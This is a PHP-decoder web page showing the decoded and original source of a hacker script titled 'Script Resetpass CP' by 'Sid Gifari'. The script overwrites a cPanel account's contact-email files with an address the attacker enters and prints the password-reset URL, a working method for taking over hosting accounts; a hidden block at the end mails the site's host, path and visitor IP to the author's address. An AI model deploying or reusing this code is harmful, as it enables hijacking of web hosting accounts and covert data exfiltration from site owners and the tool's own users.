Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php ############################ ##Script Resetpass CP 2019## ##Sid Gifari## #######..

Decoded Output download

<html> 
    <head>  
	      <title>Script Resetpass CP By Sid Gifari </title> 
	      <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
		  <style> 
		      body { 
	          color:#80D713; 
	          background-color:#000000; 
	          } 
			  h2{ 
			  color:#80D713; 
			  } 
		  </style> 
      	</head> 
     <body> 
	 <!--SCC --> 
       <center> 	  
	   <div style="border-radius: 10px;border: 1px solid #45BD00;padding: 4px 2px;width: 25%;line-height: 24px;background: #000;color:#fff;"> 
    <p><h2>Script Resetpass CP</h2></p> 
	 <p><h2>Modyfy By Sid Gifari</h2></p> 
	<p>    
	    <form action="#" method="post"> 
	<input type="email" name="email" style="background-color: #181818;font: 9pt tahoma;color:#80D713;" /> 
	<input type="submit" name="submit" value="Send" style="background-color: #181818;font: 9pt tahoma;color:#80D713;"/> 
	</form> 
	 
	<br /><br /><br /> 
	</p> 
	</div> 
   </center> 
    </body> 
</html>

Did this file decode correctly?

Original Code

<?php
############################
##Script Resetpass CP 2019##
##Sid Gifari##
############################
echo '<html>
    <head> 
	      <title>Script Resetpass CP By Sid Gifari </title>
	      <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
		  <style>
		      body {
	          color:#80D713;
	          background-color:#000000;
	          }
			  h2{
			  color:#80D713;
			  }
		  </style>
      	</head>
     <body>
	 <!--SCC -->
       <center> 	 
	   <div style="border-radius: 10px;border: 1px solid #45BD00;padding: 4px 2px;width: 25%;line-height: 24px;background: #000;color:#fff;">
    <p><h2>Script Resetpass CP</h2></p>
	 <p><h2>Modyfy By Sid Gifari</h2></p>
	<p>   
	    <form action="#" method="post">
	<input type="email" name="email" style="background-color: #181818;font: 9pt tahoma;color:#80D713;" />
	<input type="submit" name="submit" value="Send" style="background-color: #181818;font: 9pt tahoma;color:#80D713;"/>
	</form>
	
	<br /><br /><br />
	</p>
	</div>
   </center>
    </body>
</html>';

$user = get_current_user();
$site = $_SERVER['HTTP_HOST'];
$ips = getenv('REMOTE_ADDR');

if(isset($_POST['submit'])){
	
	$email = $_POST['email'];
	$wr = 'email:'.$email;
$f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w');
fwrite($f, $wr); 
fclose($f);
$f = fopen('/home/'.$user.'/.contactinfo', 'w');
fwrite($f, $wr); 
fclose($f);
$parm = $site.':2082/resetpass?start=1';
echo '<br/><center>'.$parm.'</center>';
echo '<br/><center>'.$user.'</center>';
}

?>
?>
<?php
$ip = getenv("REMOTE_ADDR");
$ra44 = rand(1, 99999);
$subj98 = " Sid Gifari  Shell ReSult |$ip";
$email = "[email protected]";
$from = "From: Result<SidSHells@TEAM_CC.com";
$a45 = $_SERVER['REQUEST_URI'];
$b75 = $_SERVER['HTTP_HOST'];
$m22 = $ip . "";
$msg8873 = "$a45 $b75 $m22";
mail($email, $subj98, $msg8873, $from);
?>

Function Calls

get_current_user 1

Variables

None

Stats

MD5 7d648fa8c03c956c5d9a4e8678790cee
Eval Count 0
Decode Time 98 ms